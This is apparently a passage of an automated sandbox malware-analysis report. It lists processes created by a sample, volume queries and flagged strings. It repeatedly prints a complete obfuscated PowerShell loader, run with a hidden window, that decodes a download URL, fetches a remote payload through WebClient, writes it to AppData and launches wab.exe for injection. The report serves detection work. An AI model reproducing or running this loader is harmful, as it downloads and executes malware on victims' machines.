Source: C:\Windows\System32\cmd.exe Process created: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe powershell.exe -windowstyle hidden "$sublicense = 1;$Solbatteri='Sub';$Solbatteri+='strin';$Solbatteri+='g';Function Udvindende($Twistende){$Lastelinie=$Twistende.Length-$sublicense;For($Firblok=5;$Firblok -lt $Lastelinie;$Firblok+=6){$lunelsen+=$Twistende.$Solbatteri.Invoke( $Firblok, $sublicense);}$lunelsen;}function Unschool($Squimmidge){. ($Jetmotoren) ($Squimmidge);}$Pedicures=Udvindende 'TestiMMiljloInterzShel iMil.elCol.clBifigaOvers/Stepp5Ne kw. A er0Ego r Konku(IndskWin vii.ernin kaksdTrilloByggewKoreisDu,st O,debN XenoTPrisl Matem1Unher0 Inla.Pr,fa0Samme;Ote.t BrnesW ,isciAureanSenso6Under4glyce; ihra NotatxSoci 6 F.ap4Terzi; Honn Gyro.rHoultv S,ns:spell1Oli.t2Indbl1s end.Capit0Kratt)C,oic genetGRysteePremac,mudskNonuboDevis/ S or2Misdd0.dgan1Misha0Stjyd0Velst1Haa d0 S,ip1.ndig NoradFOr iei nergrSe ereDy.tbfFluoroIndpaxSludr/Mod.r1spu.r2 Smut1Ugl,d.Ingra0Se ue ';$Privileged=Udvindende 'Ob,diUA.dsesMsk,ne ,arar Matr-Jord.AUterog reeseBe trnTe.tatDis i ';$Sprngningers=Udvindende 'juncah,ripyt Sfyrtsupr.pFa.lesF,rpo:Prunt/Argum/ D.scwElskowMumifw hers.DollasacidoeSemilnmisled lyndsImparpKendea unnic ugeaeThist.DokhacOmnipo ugtim.allw/Curetp O firStipuoGl zi/Guerid SkablBa st/JogurwIntralVitr oShirtrSamfuhSlvsmsSk,dk ';$Forlovede=Udvindende 'Rel,a>R,kla ';$Jetmotoren=Udvindende 'Cor,ii KliseCuchix Kyse ';$Tendrilous='Handleformerne';$Veta13 = Udvindende 'SkytseCentrcAllithUnguio Tu.i ,ndka%mbleraMonocp IntepForstd FiliaHikketTeg,vaya.ne% Ou.w\CytopFVetere,likvtSa.tltA.riglMelleeJakob.TugteHToilfaUn,ernPuebl Folk&Nonpa&L.dar Xx.ndeDeamic RegihIncanoRhila Betint.agua ';Unschool (Udvindende 'Flo,r$CyprigLevnelSluk oUns ib In.laCompulR,tsf:NedgrSovertaSjofllUdsteuSorbet Druke waver.uadresnil,r Samo=Hneky(YderzcNain m Compd arga Helt/HetercDekup ,ylli$AskebVDusineFlowetHal,taFar,e1 Akva3Tjrne) aktf ');Unschool (Udvindende ' Ustk$Teh ng Ddssl,ndeloSentibRetiraSaddll Thor:SacchFP.erelUdgandNavernSeedeiKphesn Ove,gGrnsesIndstt UndeiArched alkieDisk,n Ove,sRatin=Inter$.tultS Sentp UdvirBenzin vantgP rapnKis.liD,rignposefgSub eeTravbr Nonss Mand. GinnsRnerepAllesl SmediAktiotMinke( Rejs$antifFJ sovoNer,orW.resl StrooCheefvNaadseBirdidTree e Fi.s)Gulds ');$Sprngningers=$Fldningstidens[0];$Unaccidented180= (Udvindende 'Phyll$AffejgSandwlbolvro K inbL peaaHac,bl Jagt:LngstBSiolaa HarrsProtoiAllemc Tornh De.mrClassoMell mcutt iForr oKalibl SkrfeC.nce=Remi NXericeGreenw arry-N.npeOkajakbUvejsj Zoquebioc,cAlgovt Rotu .nchSconvey GeogsTermitRetteeBerrimRoege.H gisN.antaeInductGtehu.Gr ndWEr bre S,lvbHolocCMargal Aktai ko.oeLocasn usigt');$Unaccidented180+=$Saluterer[1];Unschool ($Unaccidented180);Unschool (Udvindende 'Disle$ski,dB.aphoaRejems De.fiBage c ProchUnshirVip.tod alymcurviiStalaoMichelZon,neWall,.Ko.seHFiskeeU.cita speldDezine N.herSentisTaste[ Pulv$SmagsPStjerr Th riUnderv FanaiTillalP.odue TurbgKonveeTilskdmorfo]Ubety=E hel$ PlanPHoarseEkspod Molli holdcOrdinuHiplir SysteP.pulsHy Jump to behavior
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe Process created: C:\Windows\System32\cmd.exe "C:\Windows\system32\cmd.exe" /c "echo %appdata%\Fettle.Han && echo t" Jump to behavior
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe Process created: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe "C:\Windows\syswow64\WindowsPowerShell\v1.0\powershell.exe" "$sublicense = 1;$Solbatteri='Sub';$Solbatteri+='strin';$Solbatteri+='g';Function Udvindende($Twistende){$Lastelinie=$Twistende.Length-$sublicense;For($Firblok=5;$Firblok -lt $Lastelinie;$Firblok+=6){$lunelsen+=$Twistende.$Solbatteri.Invoke( $Firblok, $sublicense);}$lunelsen;}function Unschool($Squimmidge){. ($Jetmotoren) ($Squimmidge);}$Pedicures=Udvindende 'TestiMMiljloInterzShel iMil.elCol.clBifigaOvers/Stepp5Ne kw. A er0Ego r Konku(IndskWin vii.ernin kaksdTrilloByggewKoreisDu,st O,debN XenoTPrisl Matem1Unher0 Inla.Pr,fa0Samme;Ote.t BrnesW ,isciAureanSenso6Under4glyce; ihra NotatxSoci 6 F.ap4Terzi; Honn Gyro.rHoultv S,ns:spell1Oli.t2Indbl1s end.Capit0Kratt)C,oic genetGRysteePremac,mudskNonuboDevis/ S or2Misdd0.dgan1Misha0Stjyd0Velst1Haa d0 S,ip1.ndig NoradFOr iei nergrSe ereDy.tbfFluoroIndpaxSludr/Mod.r1spu.r2 Smut1Ugl,d.Ingra0Se ue ';$Privileged=Udvindende 'Ob,diUA.dsesMsk,ne ,arar Matr-Jord.AUterog reeseBe trnTe.tatDis i ';$Sprngningers=Udvindende 'juncah,ripyt Sfyrtsupr.pFa.lesF,rpo:Prunt/Argum/ D.scwElskowMumifw hers.DollasacidoeSemilnmisled lyndsImparpKendea unnic ugeaeThist.DokhacOmnipo ugtim.allw/Curetp O firStipuoGl zi/Guerid SkablBa st/JogurwIntralVitr oShirtrSamfuhSlvsmsSk,dk ';$Forlovede=Udvindende 'Rel,a>R,kla ';$Jetmotoren=Udvindende 'Cor,ii KliseCuchix Kyse ';$Tendrilous='Handleformerne';$Veta13 = Udvindende 'SkytseCentrcAllithUnguio Tu.i ,ndka%mbleraMonocp IntepForstd FiliaHikketTeg,vaya.ne% Ou.w\CytopFVetere,likvtSa.tltA.riglMelleeJakob.TugteHToilfaUn,ernPuebl Folk&Nonpa&L.dar Xx.ndeDeamic RegihIncanoRhila Betint.agua ';Unschool (Udvindende 'Flo,r$CyprigLevnelSluk oUns ib In.laCompulR,tsf:NedgrSovertaSjofllUdsteuSorbet Druke waver.uadresnil,r Samo=Hneky(YderzcNain m Compd arga Helt/HetercDekup ,ylli$AskebVDusineFlowetHal,taFar,e1 Akva3Tjrne) aktf ');Unschool (Udvindende ' Ustk$Teh ng Ddssl,ndeloSentibRetiraSaddll Thor:SacchFP.erelUdgandNavernSeedeiKphesn Ove,gGrnsesIndstt UndeiArched alkieDisk,n Ove,sRatin=Inter$.tultS Sentp UdvirBenzin vantgP rapnKis.liD,rignposefgSub eeTravbr Nonss Mand. GinnsRnerepAllesl SmediAktiotMinke( Rejs$antifFJ sovoNer,orW.resl StrooCheefvNaadseBirdidTree e Fi.s)Gulds ');$Sprngningers=$Fldningstidens[0];$Unaccidented180= (Udvindende 'Phyll$AffejgSandwlbolvro K inbL peaaHac,bl Jagt:LngstBSiolaa HarrsProtoiAllemc Tornh De.mrClassoMell mcutt iForr oKalibl SkrfeC.nce=Remi NXericeGreenw arry-N.npeOkajakbUvejsj Zoquebioc,cAlgovt Rotu .nchSconvey GeogsTermitRetteeBerrimRoege.H gisN.antaeInductGtehu.Gr ndWEr bre S,lvbHolocCMargal Aktai ko.oeLocasn usigt');$Unaccidented180+=$Saluterer[1];Unschool ($Unaccidented180);Unschool (Udvindende 'Disle$ski,dB.aphoaRejems De.fiBage c ProchUnshirVip.tod alymcurviiStalaoMichelZon,neWall,.Ko.seHFiskeeU.cita speldDezine N.herSentisTaste[ Pulv$SmagsPStjerr Th riUnderv FanaiTillalP.odue TurbgKonveeTilskdmorfo]Ubety=E hel$ PlanPHoarseEkspod Molli holdcOr Jump to behavior
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe Process created: C:\Windows\SysWOW64\cmd.exe "C:\Windows\system32\cmd.exe" /c "echo %appdata%\Fettle.Han && echo t" Jump to behavior
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe Process created: C:\Program Files (x86)\Windows Mail\wab.exe "C:\Program Files (x86)\windows mail\wab.exe" Jump to behavior
Very long cmdline option found, this is very uncommon (may be encrypted or packed)
Source: C:\Windows\System32\cmd.exe Process created: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe powershell.exe -windowstyle hidden "$sublicense = 1;$solbatteri='sub';$solbatteri+='strin';$solbatteri+='g';function udvindende($twistende){$lastelinie=$twistende.length-$sublicense;for($firblok=5;$firblok -lt $lastelinie;$firblok+=6){$lunelsen+=$twistende.$solbatteri.invoke( $firblok, $sublicense);}$lunelsen;}function unschool($squimmidge){. ($jetmotoren) ($squimmidge);}$pedicures=udvindende 'testimmiljlointerzshel imil.elcol.clbifigaovers/stepp5ne kw. a er0ego r konku(indskwin vii.ernin kaksdtrillobyggewkoreisdu,st o,debn xenotprisl matem1unher0 inla.pr,fa0samme;ote.t brnesw ,isciaureansenso6under4glyce; ihra notatxsoci 6 f.ap4terzi; honn gyro.rhoultv s,ns:spell1oli.t2indbl1s end.capit0kratt)c,oic genetgrysteepremac,mudsknonubodevis/ s or2misdd0.dgan1misha0stjyd0velst1haa d0 s,ip1.ndig noradfor iei nergrse eredy.tbffluoroindpaxsludr/mod.r1spu.r2 smut1ugl,d.ingra0se ue ';$privileged=udvindende 'ob,diua.dsesmsk,ne ,arar matr-jord.auterog reesebe trnte.tatdis i ';$sprngningers=udvindende 'juncah,ripyt sfyrtsupr.pfa.lesf,rpo:prunt/argum/ d.scwelskowmumifw hers.dollasacidoesemilnmisled lyndsimparpkendea unnic ugeaethist.dokhacomnipo ugtim.allw/curetp o firstipuogl zi/guerid skablba st/jogurwintralvitr oshirtrsamfuhslvsmssk,dk ';$forlovede=udvindende 'rel,a>r,kla ';$jetmotoren=udvindende 'cor,ii klisecuchix kyse ';$tendrilous='handleformerne';$veta13 = udvindende 'skytsecentrcallithunguio tu.i ,ndka%mbleramonocp intepforstd filiahikketteg,vaya.ne% ou.w\cytopfvetere,likvtsa.tlta.riglmelleejakob.tugtehtoilfaun,ernpuebl folk&nonpa&l.dar xx.ndedeamic regihincanorhila betint.agua ';unschool (udvindende 'flo,r$cypriglevnelsluk ouns ib in.lacompulr,tsf:nedgrsovertasjoflludsteusorbet druke waver.uadresnil,r samo=hneky(yderzcnain m compd arga helt/hetercdekup ,ylli$askebvdusineflowethal,tafar,e1 akva3tjrne) aktf ');unschool (udvindende ' ustk$teh ng ddssl,ndelosentibretirasaddll thor:sacchfp.ereludgandnavernseedeikphesn ove,ggrnsesindstt undeiarched alkiedisk,n ove,sratin=inter$.tults sentp udvirbenzin vantgp rapnkis.lid,rignposefgsub eetravbr nonss mand. ginnsrnerepallesl smediaktiotminke( rejs$antiffj sovoner,orw.resl stroocheefvnaadsebirdidtree e fi.s)gulds ');$sprngningers=$fldningstidens[0];$unaccidented180= (udvindende 'phyll$affejgsandwlbolvro k inbl peaahac,bl jagt:lngstbsiolaa harrsprotoiallemc tornh de.mrclassomell mcutt iforr okalibl skrfec.nce=remi nxericegreenw arry-n.npeokajakbuvejsj zoquebioc,calgovt rotu .nchsconvey geogstermitretteeberrimroege.h gisn.antaeinductgtehu.gr ndwer bre s,lvbholoccmargal aktai ko.oelocasn usigt');$unaccidented180+=$saluterer[1];unschool ($unaccidented180);unschool (udvindende 'disle$ski,db.aphoarejems de.fibage c prochunshirvip.tod alymcurviistalaomichelzon,newall,.ko.sehfiskeeu.cita spelddezine n.hersentistaste[ pulv$smagspstjerr th riunderv fanaitillalp.odue turbgkonveetilskdmorfo]ubety=e hel$ planphoarseekspod molli holdcordinuhiplir systep.pulshy
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe Process created: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe "c:\windows\syswow64\windowspowershell\v1.0\powershell.exe" "$sublicense = 1;$solbatteri='sub';$solbatteri+='strin';$solbatteri+='g';function udvindende($twistende){$lastelinie=$twistende.length-$sublicense;for($firblok=5;$firblok -lt $lastelinie;$firblok+=6){$lunelsen+=$twistende.$solbatteri.invoke( $firblok, $sublicense);}$lunelsen;}function unschool($squimmidge){. ($jetmotoren) ($squimmidge);}$pedicures=udvindende 'testimmiljlointerzshel imil.elcol.clbifigaovers/stepp5ne kw. a er0ego r konku(indskwin vii.ernin kaksdtrillobyggewkoreisdu,st o,debn xenotprisl matem1unher0 inla.pr,fa0samme;ote.t brnesw ,isciaureansenso6under4glyce; ihra notatxsoci 6 f.ap4terzi; honn gyro.rhoultv s,ns:spell1oli.t2indbl1s end.capit0kratt)c,oic genetgrysteepremac,mudsknonubodevis/ s or2misdd0.dgan1misha0stjyd0velst1haa d0 s,ip1.ndig noradfor iei nergrse eredy.tbffluoroindpaxsludr/mod.r1spu.r2 smut1ugl,d.ingra0se ue ';$privileged=udvindende 'ob,diua.dsesmsk,ne ,arar matr-jord.auterog reesebe trnte.tatdis i ';$sprngningers=udvindende 'juncah,ripyt sfyrtsupr.pfa.lesf,rpo:prunt/argum/ d.scwelskowmumifw hers.dollasacidoesemilnmisled lyndsimparpkendea unnic ugeaethist.dokhacomnipo ugtim.allw/curetp o firstipuogl zi/guerid skablba st/jogurwintralvitr oshirtrsamfuhslvsmssk,dk ';$forlovede=udvindende 'rel,a>r,kla ';$jetmotoren=udvindende 'cor,ii klisecuchix kyse ';$tendrilous='handleformerne';$veta13 = udvindende 'skytsecentrcallithunguio tu.i ,ndka%mbleramonocp intepforstd filiahikketteg,vaya.ne% ou.w\cytopfvetere,likvtsa.tlta.riglmelleejakob.tugtehtoilfaun,ernpuebl folk&nonpa&l.dar xx.ndedeamic regihincanorhila betint.agua ';unschool (udvindende 'flo,r$cypriglevnelsluk ouns ib in.lacompulr,tsf:nedgrsovertasjoflludsteusorbet druke waver.uadresnil,r samo=hneky(yderzcnain m compd arga helt/hetercdekup ,ylli$askebvdusineflowethal,tafar,e1 akva3tjrne) aktf ');unschool (udvindende ' ustk$teh ng ddssl,ndelosentibretirasaddll thor:sacchfp.ereludgandnavernseedeikphesn ove,ggrnsesindstt undeiarched alkiedisk,n ove,sratin=inter$.tults sentp udvirbenzin vantgp rapnkis.lid,rignposefgsub eetravbr nonss mand. ginnsrnerepallesl smediaktiotminke( rejs$antiffj sovoner,orw.resl stroocheefvnaadsebirdidtree e fi.s)gulds ');$sprngningers=$fldningstidens[0];$unaccidented180= (udvindende 'phyll$affejgsandwlbolvro k inbl peaahac,bl jagt:lngstbsiolaa harrsprotoiallemc tornh de.mrclassomell mcutt iforr okalibl skrfec.nce=remi nxericegreenw arry-n.npeokajakbuvejsj zoquebioc,calgovt rotu .nchsconvey geogstermitretteeberrimroege.h gisn.antaeinductgtehu.gr ndwer bre s,lvbholoccmargal aktai ko.oelocasn usigt');$unaccidented180+=$saluterer[1];unschool ($unaccidented180);unschool (udvindende 'disle$ski,db.aphoarejems de.fibage c prochunshirvip.tod alymcurviistalaomichelzon,newall,.ko.sehfiskeeu.cita spelddezine n.hersentistaste[ pulv$smagspstjerr th riunderv fanaitillalp.odue turbgkonveetilskdmorfo]ubety=e hel$ planphoarseekspod molli holdcor
Source: C:\Windows\System32\cmd.exe Process created: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe powershell.exe -windowstyle hidden "$sublicense = 1;$solbatteri='sub';$solbatteri+='strin';$solbatteri+='g';function udvindende($twistende){$lastelinie=$twistende.length-$sublicense;for($firblok=5;$firblok -lt $lastelinie;$firblok+=6){$lunelsen+=$twistende.$solbatteri.invoke( $firblok, $sublicense);}$lunelsen;}function unschool($squimmidge){. ($jetmotoren) ($squimmidge);}$pedicures=udvindende 'testimmiljlointerzshel imil.elcol.clbifigaovers/stepp5ne kw. a er0ego r konku(indskwin vii.ernin kaksdtrillobyggewkoreisdu,st o,debn xenotprisl matem1unher0 inla.pr,fa0samme;ote.t brnesw ,isciaureansenso6under4glyce; ihra notatxsoci 6 f.ap4terzi; honn gyro.rhoultv s,ns:spell1oli.t2indbl1s end.capit0kratt)c,oic genetgrysteepremac,mudsknonubodevis/ s or2misdd0.dgan1misha0stjyd0velst1haa d0 s,ip1.ndig noradfor iei nergrse eredy.tbffluoroindpaxsludr/mod.r1spu.r2 smut1ugl,d.ingra0se ue ';$privileged=udvindende 'ob,diua.dsesmsk,ne ,arar matr-jord.auterog reesebe trnte.tatdis i ';$sprngningers=udvindende 'juncah,ripyt sfyrtsupr.pfa.lesf,rpo:prunt/argum/ d.scwelskowmumifw hers.dollasacidoesemilnmisled lyndsimparpkendea unnic ugeaethist.dokhacomnipo ugtim.allw/curetp o firstipuogl zi/guerid skablba st/jogurwintralvitr oshirtrsamfuhslvsmssk,dk ';$forlovede=udvindende 'rel,a>r,kla ';$jetmotoren=udvindende 'cor,ii klisecuchix kyse ';$tendrilous='handleformerne';$veta13 = udvindende 'skytsecentrcallithunguio tu.i ,ndka%mbleramonocp intepforstd filiahikketteg,vaya.ne% ou.w\cytopfvetere,likvtsa.tlta.riglmelleejakob.tugtehtoilfaun,ernpuebl folk&nonpa&l.dar xx.ndedeamic regihincanorhila betint.agua ';unschool (udvindende 'flo,r$cypriglevnelsluk ouns ib in.lacompulr,tsf:nedgrsovertasjoflludsteusorbet druke waver.uadresnil,r samo=hneky(yderzcnain m compd arga helt/hetercdekup ,ylli$askebvdusineflowethal,tafar,e1 akva3tjrne) aktf ');unschool (udvindende ' ustk$teh ng ddssl,ndelosentibretirasaddll thor:sacchfp.ereludgandnavernseedeikphesn ove,ggrnsesindstt undeiarched alkiedisk,n ove,sratin=inter$.tults sentp udvirbenzin vantgp rapnkis.lid,rignposefgsub eetravbr nonss mand. ginnsrnerepallesl smediaktiotminke( rejs$antiffj sovoner,orw.resl stroocheefvnaadsebirdidtree e fi.s)gulds ');$sprngningers=$fldningstidens[0];$unaccidented180= (udvindende 'phyll$affejgsandwlbolvro k inbl peaahac,bl jagt:lngstbsiolaa harrsprotoiallemc tornh de.mrclassomell mcutt iforr okalibl skrfec.nce=remi nxericegreenw arry-n.npeokajakbuvejsj zoquebioc,calgovt rotu .nchsconvey geogstermitretteeberrimroege.h gisn.antaeinductgtehu.gr ndwer bre s,lvbholoccmargal aktai ko.oelocasn usigt');$unaccidented180+=$saluterer[1];unschool ($unaccidented180);unschool (udvindende 'disle$ski,db.aphoarejems de.fibage c prochunshirvip.tod alymcurviistalaomichelzon,newall,.ko.sehfiskeeu.cita spelddezine n.hersentistaste[ pulv$smagspstjerr th riunderv fanaitillalp.odue turbgkonveetilskdmorfo]ubety=e hel$ planphoarseekspod molli holdcordinuhiplir systep.pulshy Jump to behavior
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe Process created: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe "c:\windows\syswow64\windowspowershell\v1.0\powershell.exe" "$sublicense = 1;$solbatteri='sub';$solbatteri+='strin';$solbatteri+='g';function udvindende($twistende){$lastelinie=$twistende.length-$sublicense;for($firblok=5;$firblok -lt $lastelinie;$firblok+=6){$lunelsen+=$twistende.$solbatteri.invoke( $firblok, $sublicense);}$lunelsen;}function unschool($squimmidge){. ($jetmotoren) ($squimmidge);}$pedicures=udvindende 'testimmiljlointerzshel imil.elcol.clbifigaovers/stepp5ne kw. a er0ego r konku(indskwin vii.ernin kaksdtrillobyggewkoreisdu,st o,debn xenotprisl matem1unher0 inla.pr,fa0samme;ote.t brnesw ,isciaureansenso6under4glyce; ihra notatxsoci 6 f.ap4terzi; honn gyro.rhoultv s,ns:spell1oli.t2indbl1s end.capit0kratt)c,oic genetgrysteepremac,mudsknonubodevis/ s or2misdd0.dgan1misha0stjyd0velst1haa d0 s,ip1.ndig noradfor iei nergrse eredy.tbffluoroindpaxsludr/mod.r1spu.r2 smut1ugl,d.ingra0se ue ';$privileged=udvindende 'ob,diua.dsesmsk,ne ,arar matr-jord.auterog reesebe trnte.tatdis i ';$sprngningers=udvindende 'juncah,ripyt sfyrtsupr.pfa.lesf,rpo:prunt/argum/ d.scwelskowmumifw hers.dollasacidoesemilnmisled lyndsimparpkendea unnic ugeaethist.dokhacomnipo ugtim.allw/curetp o firstipuogl zi/guerid skablba st/jogurwintralvitr oshirtrsamfuhslvsmssk,dk ';$forlovede=udvindende 'rel,a>r,kla ';$jetmotoren=udvindende 'cor,ii klisecuchix kyse ';$tendrilous='handleformerne';$veta13 = udvindende 'skytsecentrcallithunguio tu.i ,ndka%mbleramonocp intepforstd filiahikketteg,vaya.ne% ou.w\cytopfvetere,likvtsa.tlta.riglmelleejakob.tugtehtoilfaun,ernpuebl folk&nonpa&l.dar xx.ndedeamic regihincanorhila betint.agua ';unschool (udvindende 'flo,r$cypriglevnelsluk ouns ib in.lacompulr,tsf:nedgrsovertasjoflludsteusorbet druke waver.uadresnil,r samo=hneky(yderzcnain m compd arga helt/hetercdekup ,ylli$askebvdusineflowethal,tafar,e1 akva3tjrne) aktf ');unschool (udvindende ' ustk$teh ng ddssl,ndelosentibretirasaddll thor:sacchfp.ereludgandnavernseedeikphesn ove,ggrnsesindstt undeiarched alkiedisk,n ove,sratin=inter$.tults sentp udvirbenzin vantgp rapnkis.lid,rignposefgsub eetravbr nonss mand. ginnsrnerepallesl smediaktiotminke( rejs$antiffj sovoner,orw.resl stroocheefvnaadsebirdidtree e fi.s)gulds ');$sprngningers=$fldningstidens[0];$unaccidented180= (udvindende 'phyll$affejgsandwlbolvro k inbl peaahac,bl jagt:lngstbsiolaa harrsprotoiallemc tornh de.mrclassomell mcutt iforr okalibl skrfec.nce=remi nxericegreenw arry-n.npeokajakbuvejsj zoquebioc,calgovt rotu .nchsconvey geogstermitretteeberrimroege.h gisn.antaeinductgtehu.gr ndwer bre s,lvbholoccmargal aktai ko.oelocasn usigt');$unaccidented180+=$saluterer[1];unschool ($unaccidented180);unschool (udvindende 'disle$ski,db.aphoarejems de.fibage c prochunshirvip.tod alymcurviistalaomichelzon,newall,.ko.sehfiskeeu.cita spelddezine n.hersentistaste[ pulv$smagspstjerr th riunderv fanaitillalp.odue turbgkonveetilskdmorfo]ubety=e hel$ planphoarseekspod molli holdcor Jump to behavior
Source: AutoIt3_x64.exe.8.dr Binary or memory string: Run Script:AutoIt script files (*.au3, *.a3x)*.au3;*.a3xAll files (*.*)*.*au3#include depth exceeded. Make sure there are no recursive includesError opening the file>>>AUTOIT SCRIPT<<<Bad directive syntax errorUnterminated stringCannot parse #includeUnterminated group of commentsONOFF0%d%dShell_TrayWndREMOVEKEYSEXISTSAPPENDblankinfoquestionstopwarning
Queries the volume information (name, serial number etc) of a device
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe Queries volume information: C:\ VolumeInformation Jump to behavior
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe Queries volume information: C:\ VolumeInformation Jump to behavior
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe Queries volume information: C:\ VolumeInformation Jump to behavior
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe Queries volume information: C:\Windows\System32\CatRoot\{F750E6C3-38EE-11D1-85E5-00C04FC295EE}\Microsoft-Windows-Client-Features-Package0313~31bf3856ad364e35~amd64~~10.0.19041.1949.cat VolumeInformation Jump to behavior
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe Queries volume information: C:\Windows\Microsoft.NET\assembly\GAC_64\System.Data\v4.0_4.0.0.0__b77a5c561934e089\System.Data.dll VolumeInformation Jump to behavior
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe Queries volume information: C:\Windows\Microsoft.NET\assembly\GAC_64\System.Transactions\v4.0_4.0.0.0__b77a5c561934e089\System.Transactions.dll VolumeInformation Jump to behavior
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe Queries volume information: C:\ VolumeInformation Jump to behavior
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe Queries volume information: C:\Windows\System32\CatRoot\{F750E6C3-38EE-11D1-85E5-00C04FC295EE}\Microsoft-Windows-Client-Features-Package0313~31bf3856ad364e35~amd64~~10.0.19041.1949.cat VolumeInformation Jump to behavior
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe Queries volume information: C:\Windows\System32\CatRoot\{F750E6C3-38EE-11D1-85E5-00C04FC295EE}\Microsoft-Windows-Client-Features-Package0313~31bf3856ad364e35~amd64~~10.0.19041.1949.cat VolumeInformation Jump to behavior
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe Queries volume information: C:\Windows\System32\CatRoot\{F750E6C3-38EE-11D1-85E5-00C04FC295EE}\Microsoft-Windows-Client-Features-Package0313~31bf3856ad364e35~amd64~~10.0.19041.1949.cat VolumeInformation Jump to behavior
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe Queries volume information: C:\Windows\System32\CatRoot\{F750E6C3-38EE-11D1-85E5-00C04FC295EE}\Microsoft-Windows-Client-Features-Package0313~31bf3856ad364e35~amd64~~10.0.19041.1949.cat VolumeInformation Jump to behavior
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe Queries volume information: C:\Windows\System32\CatRoot\{F750E6C3-38EE-11D1-85E5-00C04FC295EE}\Microsoft-Windows-Client-Features-Package0313~31bf3856ad364e35~amd64~~10.0.19041.1949.cat VolumeInformation Jump to behavior
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe Queries volume information: C:\Windows\System32\CatRoot\{F750E6C3-38EE-11D1-85E5-00C04FC295EE}\Microsoft-Windows-Client-Features-Package0313~31bf3856ad364e35~amd64~~10.0.19041.1949.cat VolumeInformation Jump to behavior
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe Queries volume information: C:\Windows\Microsoft.NET\assembly\GAC_32\System.Data\v4.0_4.0.0.0__b77a5c561934e089\System.Data.dll VolumeInformation Jump to behavior
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe Queries volume information: C:\Windows\System32\CatRoot\{F750E6C3-38EE-11D1-85E5-00C04FC295EE}\Microsoft-Windows-Client-Features-Package0313~31bf3856ad364e35~amd64~~10.0.19041.1949.cat VolumeInformation Jump to behavior
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe Queries volume information: C:\Windows\Microsoft.NET\assembly\GAC_32\System.Transactions\v4.0_4.0.0.0__b77a5c561934e089\System.Transactions.dll VolumeInformation Jump to behavior
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe Queries volume information: C:\ VolumeInformation Jump to behavior
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe Queries volume information: C:\Windows\System32\CatRoot\{F750E6C3-38EE-11D1-85E5-00C04FC295EE}\Microsoft-Windows-Client-Features-Package0313~31bf3856ad364e35~amd64~~10.0.19041.1949.cat VolumeInformation Jump to behavior
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe Queries volume information: C:\Windows\System32\CatRoot\{F750E6C3-38EE-11D1-85E5-00C04FC295EE}\Microsoft-Windows-Client-Features-Package0313~31bf3856ad364e35~amd64~~10.0.19041.1949.cat VolumeInformation Jump to behavior
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe Queries volume information: C:\Windows\System32\CatRoot\{F750E6C3-38EE-11D1-85E5-00C04FC295EE}\Microsoft-Windows-Client-Features-Package0313~31bf3856ad364e35~amd64~~10.0.19041.1949.cat VolumeInformation Jump to behavior
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe Queries volume information: C:\Windows\System32\CatRoot\{F750E6C3-38EE-11D1-85E5-00C04FC295EE}\Microsoft-Windows-Client-Features-Package0313~31bf3856ad364e35~amd64~~10.0.19041.1949.cat VolumeInformation Jump to behavior
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe Queries volume information: C:\Windows\System32\CatRoot\{F750E6C3-38EE-11D1-85E5-00C04FC295EE}\Microsoft-Windows-Client-Features-Package0313~31bf3856ad364e35~amd64~~10.0.19041.1949.cat VolumeInformation Jump to behavior
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe Queries volume information: C:\Windows\System32\CatRoot\{F750E6C3-38EE-11D1-85E5-00C04FC295EE}\Microsoft-Windows-Client-Features-Package0313~31bf3856ad364e35~amd64~~10.0.19041.1949.cat VolumeInformation Jump to behavior
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe Queries volume information: C:\Windows\System32\CatRoot\{F750E6C3-38EE-11D1-85E5-00C04FC295EE}\Microsoft-Windows-Client-Features-Package0313~31bf3856ad364e35~amd64~~10.0.19041.1949.cat VolumeInformation Jump to behavior
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe Queries volume information: C:\Windows\Microsoft.NET\assembly\GAC_MSIL\Microsoft.PowerShell.Commands.Management\v4.0_3.0.0.0__31bf3856ad364e35\Microsoft.PowerShell.Commands.Management.dll VolumeInformation Jump to behavior
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe Queries volume information: C:\Windows\Microsoft.NET\assembly\GAC_MSIL\System.ServiceProcess\v4.0_4.0.0.0__b03f5f7f11d50a3a\System.ServiceProcess.dll VolumeInformation Jump to behavior
